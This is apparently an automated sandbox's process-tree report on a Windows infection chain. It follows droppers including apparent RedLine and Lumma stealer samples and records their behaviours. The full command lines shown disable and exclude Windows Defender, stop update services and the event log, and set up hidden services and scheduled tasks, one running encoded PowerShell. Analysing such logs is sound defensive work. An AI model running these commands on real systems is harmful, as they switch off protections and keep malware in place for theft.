C:\Program Files (x86)\1717795646_0\360TS_Setup.exe"C:\Program Files (x86)\1717795646_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall7⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Drops file in Program Files directory
PID:2580
-
-
-
-
C:\Users\Admin\Pictures\HqA55f547cg1gL6v7PJmBsf8.exe"C:\Users\Admin\Pictures\HqA55f547cg1gL6v7PJmBsf8.exe"5⤵
- Modifies firewall policy service
- Executes dropped EXE
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2700
-
-
C:\Users\Admin\Pictures\iw2rdwuO01Y7ysK806SnpS14.exe"C:\Users\Admin\Pictures\iw2rdwuO01Y7ysK806SnpS14.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Users\Admin\AppData\Local\Temp\7zS500.tmp\Install.exe.\Install.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Users\Admin\AppData\Local\Temp\7zS9D0.tmp\Install.exe.\Install.exe /yqjCHdidlQ "385118" /S7⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵PID:2196
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"9⤵PID:2092
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵PID:1744
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:1548
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"9⤵PID:1008
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵PID:1308
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵PID:1612
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"9⤵PID:2292
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵PID:2312
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵PID:684
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"9⤵PID:1740
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵PID:928
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵PID:1576
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵PID:1068
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵PID:2104
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force12⤵PID:1912
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"8⤵PID:2860
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵PID:2888
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bjPRdWxZxSSObMFEvg" /SC once /ST 21:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp\YtzlZLSVfDGwulo\EByWAxd.exe\" PX /KtEdidAmoA 385118 /S" /V1 /F8⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2016
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bjPRdWxZxSSObMFEvg"8⤵PID:2044
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bjPRdWxZxSSObMFEvg9⤵PID:2008
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bjPRdWxZxSSObMFEvg10⤵PID:2960
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 4328⤵
- Loads dropped DLL
- Program crash
PID:2776
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"3⤵
- Executes dropped EXE
PID:1248
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:940 -
C:\Users\Admin\AppData\Local\Temp\onefile_940_133622691884220000\stub.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1580
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"3⤵
- Executes dropped EXE
PID:1396 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 524⤵
- Loads dropped DLL
- Program crash
PID:1288
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000009001\lumma123.exe"C:\Users\Admin\AppData\Local\Temp\1000009001\lumma123.exe"3⤵
- Executes dropped EXE
PID:1064 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 724⤵
- Loads dropped DLL
- Program crash
PID:1304
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000021001\NewR.exe"C:\Users\Admin\AppData\Local\Temp\1000021001\NewR.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1988 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewR.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000021001\NewR.exe" /F4⤵
- Creates scheduled task(s)
PID:532
-
-
C:\Users\Admin\AppData\Local\Temp\1000294001\FirstZ.exe"C:\Users\Admin\AppData\Local\Temp\1000294001\FirstZ.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1976 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:768
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
- Drops file in Windows directory
PID:1680
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:472
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:1112
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:1104
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:2264
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:2972
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WSNKISKT"5⤵
- Launches sc.exe
PID:1072
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"5⤵
- Launches sc.exe
PID:2464
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:2016
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WSNKISKT"5⤵
- Launches sc.exe
PID:2220
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe"C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\setup222-6d945e47cea9ab13\setup222.exe"C:\Users\Admin\AppData\Local\Temp\setup222-6d945e47cea9ab13\setup222.exe"4⤵
- Executes dropped EXE
PID:2164
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000026001\whiteheroin.exe"C:\Users\Admin\AppData\Local\Temp\1000026001\whiteheroin.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1472
-
-
C:\Users\Admin\AppData\Local\Temp\1000027001\taskmanager.exe"C:\Users\Admin\AppData\Local\Temp\1000027001\taskmanager.exe"3⤵
- Executes dropped EXE
PID:768
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {78740F3A-EA31-4D76-AD5F-C0FE48BD3D04} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:944
-
C:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp\YtzlZLSVfDGwulo\EByWAxd.exeC:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp\YtzlZLSVfDGwulo\EByWAxd.exe PX /KtEdidAmoA 385118 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2332 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2860
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2356
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1768
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1604
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:1500
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1112
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2708
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2148
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2664
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1336
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:792
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1588
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:1200
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2300
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:804
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1292
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwLPlBUuV" /SC once /ST 01:01:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwLPlBUuV"3⤵PID:3052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwLPlBUuV"3⤵PID:1960
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2744
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2232
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:524
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MlEwZvbgpCGVQFZq" /t REG_DWORD /d 0 /reg:323⤵PID:972
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MlEwZvbgpCGVQFZq" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1352
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MlEwZvbgpCGVQFZq" /t REG_DWORD /d 0 /reg:643⤵PID:2660
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MlEwZvbgpCGVQFZq" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2684
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MlEwZvbgpCGVQFZq" /t REG_DWORD /d 0 /reg:323⤵PID:2608
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MlEwZvbgpCGVQFZq" /t REG_DWORD /d 0 /reg:324⤵PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MlEwZvbgpCGVQFZq" /t REG_DWORD /d 0 /reg:643⤵PID:2196
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MlEwZvbgpCGVQFZq" /t REG_DWORD /d 0 /reg:644⤵PID:2928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\MlEwZvbgpCGVQFZq\nXbHYvnB\FiBAnaFkgqypDUYp.wsf"3⤵PID:2724
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\MlEwZvbgpCGVQFZq\nXbHYvnB\FiBAnaFkgqypDUYp.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2404 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZzJFgnUaheUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZzJFgnUaheUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efSuucJNImPU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efSuucJNImPU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gWMsjtYByovYC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gWMsjtYByovYC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qfQXRdAKnlsTdhGWuTR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qfQXRdAKnlsTdhGWuTR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\voItHROCU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\voItHROCU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WMmUhsrLoeNTYuVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WMmUhsrLoeNTYuVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MlEwZvbgpCGVQFZq" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MlEwZvbgpCGVQFZq" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZzJFgnUaheUn" /t REG_DWORD /d 0 /reg:324⤵PID:2484
-
-
